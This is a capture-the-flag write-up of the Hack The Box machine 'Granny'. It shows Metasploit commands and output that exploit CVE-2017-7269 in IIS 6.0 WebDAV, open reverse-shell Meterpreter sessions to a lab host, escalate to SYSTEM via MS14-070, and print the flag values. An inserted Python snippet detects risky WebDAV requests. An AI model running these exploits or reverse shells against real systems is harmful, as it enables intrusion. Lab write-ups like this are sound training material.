Keep Calm and Hack The Box – Granny
Hack The Box (HTB) is an online platform allowing you to test and advance your penetration testing and cybersecurity skills. It contains a wide variety of challenges simulating real-world scenarios and vulnerabilities. Granny is one of the retired HTB machines rated as easy difficulty.
In this write-up, we'll walk through the process of compromising Granny from an unauthenticated remote attacker to full system access. We'll see how a combination of an outdated web server version and missing security patches can have severe consequences.
Reconnaissance
The first step in penetration testing is conducting thorough reconnaissance of the target system. We want to gather as much information as possible to identify potential attack vectors.
Our initial port scan using Nmap reveals that Granny has a single port open – TCP port 80 running an HTTP server:
$ nmap -sV -sC -p- granny.htb
Starting Nmap 7.92 ( https://nmap.org )
Nmap scan report for granny.htb (10.10.10.15)
Host is up (0.031s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-title: Under Construction
|_http-server-header: Microsoft-IIS/6.0
|_http-webdav-scan: WebDAV enabled (PROPFIND)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
The scan reveals some key information:
- The HTTP server is Microsoft IIS version 6.0
- The website appears to be "Under Construction"
- WebDAV (Web Distributed Authoring and Versioning) is enabled
- Several potentially risky HTTP methods like PUT and MOVE are allowed
IIS 6.0 is a legacy version released in 2003 and is no longer supported by Microsoft. It has several known vulnerabilities that were patched over the years. WebDAV is an extension of HTTP that allows clients to perform remote content authoring operations.
Let's do some further enumeration on the WebDAV functionality using davtest:
$ davtest -url http://granny.htb
********************************************************
Testing DAV connection
OPEN SUCCEED: http://granny.htb
********************************************************
NOTE Random string for this session: YzE318b6Dqcqjp
********************************************************
Creating directory
MKCOL FAIL
********************************************************
Sending test files
PUT php FAIL
PUT jhtml FAIL
PUT cgi FAIL
PUT asp FAIL
PUT aspx FAIL
PUT pl FAIL
PUT shtml FAIL
PUT cfm FAIL
PUT txt SUCCEED: http://granny.htb/DavTestDir_YzE318b6Dqcqjp/davtest_YzE318b6Dqcqjp.txt
********************************************************
Checking for test file execution
EXEC txt FAIL
********************************************************
The output shows that WebDAV accepts uploads, but only of a harmless .txt file: every executable file type (php, asp, aspx, and so on) is rejected, and the uploaded text file cannot be executed. Let's check if there are any known exploits for IIS 6.0 and WebDAV using Searchsploit:
$ searchsploit iis 6.0
----------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------- ---------------------------------
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass | windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1 | windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote B | windows/remote/41738.py
----------------------------------------------------------- ---------------------------------
Searchsploit found an exploit for a remote buffer overflow in the ScStoragePathFromUrl function of WebDAV. Let's examine the exploit code:
$ searchsploit -x 41738.py
...
# Exploit Title: Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow
# Exploit Author: Zhiniang Peng & Chen Wu
...
# CVE : CVE-2017-7269
...
The comments mention that this is CVE-2017-7269, a well-known vulnerability in IIS 6.0 WebDAV. It allows remote code execution by sending a crafted HTTP request with a long header. The vulnerability was disclosed in 2017 and has been widely exploited in the wild since then.
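To turn the two observations above (the risky WebDAV methods nmap listed, and the overlong header this CVE relies on) into something a defender can run over captured traffic, here is an added example inspector in Python. It is not code from the write-up or from the exploit; the sample requests are constructed, and the 512-byte threshold for the If header is an assumption chosen to sit well above what legitimate lock tokens need.

```python
"""Flag WebDAV requests matching the risky-method and oversized-header
patterns discussed above. Added example; sample requests are constructed."""

# Methods nmap's http-methods script reported as "potentially risky" on Granny.
RISKY_METHODS = {"TRACE", "DELETE", "COPY", "MOVE", "PROPFIND", "PROPPATCH",
                 "SEARCH", "MKCOL", "LOCK", "UNLOCK", "PUT"}

# Assumed threshold: a legitimate WebDAV If header carries a lock token or an
# ETag and stays far below this; CVE-2017-7269 needs a much longer one.
MAX_IF_HEADER_LEN = 512


def parse_request(raw: str):
    """Split a raw HTTP request into (method, path, headers dict)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def inspect_request(raw: str):
    """Return a list of finding strings; an empty list means nothing suspicious."""
    method, path, headers = parse_request(raw)
    findings = []
    if method in RISKY_METHODS:
        findings.append(f"risky WebDAV method {method} on {path}")
    if_hdr = headers.get("if", "")
    if len(if_hdr) > MAX_IF_HEADER_LEN:
        findings.append(f"oversized If header ({len(if_hdr)} bytes) in {method}")
    # Non-ASCII bytes in any header are abnormal for WebDAV and worth a look.
    for name, value in headers.items():
        if any(ord(c) > 127 for c in value):
            findings.append(f"non-ASCII bytes in {name} header")
            break
    return findings


# Constructed samples: a plain GET, a benign PROPFIND, and an oversized If header.
NORMAL_GET = "GET / HTTP/1.1\r\nHost: granny.htb\r\n\r\n"
BENIGN_PROPFIND = ("PROPFIND /docs/ HTTP/1.1\r\nHost: granny.htb\r\nDepth: 1\r\n"
                   "If: (<opaquelocktoken:constructed-token-1234>)\r\n\r\n")
OVERSIZED = ("PROPFIND / HTTP/1.1\r\nHost: granny.htb\r\n"
             "If: <http://granny.htb/" + "A" * 600 + ">\r\n\r\n")

if __name__ == "__main__":
    for label, req in [("get", NORMAL_GET), ("benign", BENIGN_PROPFIND), ("big", OVERSIZED)]:
        print(label, inspect_request(req))
```

A benign PROPFIND is still reported, because the point of the method check is to surface any WebDAV authoring traffic on a server where WebDAV should not be exposed at all.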
Exploitation
We'll use the Metasploit module exploit/windows/iis/iis_webdav_scstoragepathfromurl to exploit this vulnerability and gain an initial foothold on Granny.
msf6 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhosts granny.htb
rhosts => granny.htb
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost 10.10.14.22
lhost => 10.10.14.22
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run
[*] Started reverse TCP handler on 10.10.14.22:4444
[*] Trying path length 3 to 60 ...
[*] Sending stage (175174 bytes) to 10.10.10.15
[*] Meterpreter session 1 opened (10.10.14.22:4444 -> 10.10.10.15:1030) at 2022-02-18 14:01:37 -0500
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
The exploit was successful and provided us a Meterpreter shell on the target system running with NETWORK SERVICE privileges. While this is a good start, we don't have full control over the system yet.
Privilege Escalation
To find potential privilege escalation vectors, we'll use Meterpreter's local_exploit_suggester module:
meterpreter > run post/multi/recon/local_exploit_suggester
[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 38 exploit checks are being tried...
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_040_afi: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
The scan found several potential local privilege escalation exploits. The most interesting one appears to be ms14_070_tcpip_ioctl, which exploits a vulnerability in the Windows tcpip.sys driver to gain SYSTEM privileges.
Let's background our current shell and launch the local exploit:
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use exploit/windows/local/ms14_070_tcpip_ioctl
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 1
session => 1
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set lhost 10.10.14.22
lhost => 10.10.14.22
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run
[*] Started reverse TCP handler on 10.10.14.22:4444
[*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Sending stage (175174 bytes) to 10.10.10.15
[*] Meterpreter session 2 opened (10.10.14.22:4444 -> 10.10.10.15:1047) at 2022-02-18 14:15:41 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Success! We were able to leverage the vulnerability to gain full SYSTEM privileges on Granny. We now have complete control over the machine.
Post-Exploitation
With our high-privileged shell, let's hunt for the user and root flags to complete the machine.
The user flag can be found in C:\Documents and Settings\Lakis\Desktop\user.txt:
meterpreter > cat "C:\Documents and Settings\Lakis\Desktop\user.txt"
700c5dc163014e22b3e408f8703f67d1
And the root flag is located at C:\Documents and Settings\Administrator\Desktop\root.txt:
meterpreter > cat "C:\Documents and Settings\Administrator\Desktop\root.txt"
aa4beed1c0584445ab463a6747bd06e9
With that, we pwned Granny and obtained both flags!
Conclusion
In this write-up, we saw how an outdated and unpatched IIS 6.0 server can be easily compromised by a remote attacker using publicly available exploits. The CVE-2017-7269 WebDAV vulnerability allowed us to gain an initial foothold, and we escalated privileges with the MS14-070 local privilege escalation exploit to gain complete control.
This underscores the importance of keeping systems up-to-date with the latest security patches, especially internet-facing servers. Additional hardening like disabling unnecessary WebDAV functionality can also help prevent these types of attacks.
I hope you enjoyed this write-up and learned something new! Feel free to comment below with any questions or feedback. Check out some of my other HTB write-ups to learn more:
- Keep Calm and Hack The Box – Lame
- Keep Calm and Hack The Box – Legacy
- Keep Calm and Hack The Box – Beep
Until next time, keep hacking the box and stay secure!